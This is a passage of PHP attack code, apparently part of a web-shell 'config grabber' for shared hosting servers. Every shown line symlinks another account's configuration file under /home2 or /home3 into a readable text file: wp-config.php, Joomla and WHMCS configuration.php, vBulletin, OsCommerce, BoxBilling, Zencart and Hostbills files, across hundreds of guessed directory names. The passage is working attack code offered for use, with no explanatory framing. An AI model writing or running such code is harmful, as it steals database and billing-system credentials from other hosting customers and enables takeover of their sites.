  1631. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1632. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1633. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1634. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1635. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1636. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1637. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1638. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1639. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1640. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1641. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1642. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1643. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1644. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1645. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1646. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1647. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1648. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1649. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1650. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1651. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1652. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1653. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1654. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1655. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1656. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1657. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1658. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1659. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1660. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1661. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1662. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1663. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1664. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1665. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1666. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1667. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1668. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1669. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1670. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1671. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1672. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1673. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1674. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1675. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1676. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1677. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1678. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1679. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1680. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1681. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1682. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1683. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1684. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1685. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1686. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1687. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1688. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1689. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1690. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1691. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1692. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1693. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1694. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1695. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1696. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1697. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1698. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1699. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1700. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1701. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1702. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1703. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1704. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1705. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1706. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1707. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1708. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1709. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1710. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1711. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1712. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1713. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1714. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1715. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1716. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1717. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1718. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1719. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1720. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1721. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1722. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1723. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1724. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1725. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1726. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1727. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1728. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1729. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1730. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1731. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1732. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1733. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1734. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1735. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1736. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1737. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1738. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1739. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1740. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1741. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1742. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1743. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1744. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1745. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1746. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1747. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1748. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1749. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1750. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1751. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1752. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1753. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1754. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1755. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1756. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1757. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1758. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1759. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1760. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1761. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1762. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1763. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1764. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1765. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1766. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1767. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1768. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1769. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1770. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1771. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1772. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1773. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1774. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1775. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1776. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1777. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1778. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1779. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1780. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1781. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1782. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1783. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1784. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1785. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1786. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1787. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1788. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1789. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1790. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1791. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1792. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1793. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1794. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1795. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1796. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1797. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1798. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1799. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1800.  
  1801. //Home3
  1802.  
  1803. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1804. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1805. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1806. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1807. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1808. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1809. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1810. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1811. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1812. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1813. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1814. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1815. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1816. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1817. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1818. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1819. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1820. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1821. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1822. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1823. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1824. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1825. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1826. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1827. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1828. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1829. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1830. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1831. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1832. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1833. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1834. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1835. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1836. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1837. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1838. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1839. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1840. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1841. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1842. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1843. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1844. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1845. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1846. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1847. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1848. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1849. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1850. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1851. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1852. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1853. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1854. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1855. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1856. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1857. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1858. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1859. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1860. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1861. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1862. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1863. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1864. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1865. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1866. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1867. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1868. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1869. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1870. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1871. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1872. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1873. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1874. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1875. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1876. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1877. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1878. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1879. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1880. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1881. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1882. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1883. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1884. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1885. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1886. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1887. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1888. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1889. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1890. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1891. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1892. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1893. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1894. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1895. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1896. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1897. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1898. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1899. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1900. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1901. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1902. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1903. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1904. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1905. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1906. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1907. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1908. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1909. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1910. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1911. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1912. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1913. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1914. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1915. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1916. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1917. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1918. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1919. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1920. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1921. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1922. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1923. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1924. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1925. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1926. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1927. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1928. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1929. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1930. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1931. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1932. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1933. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1934. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1935. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1936. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
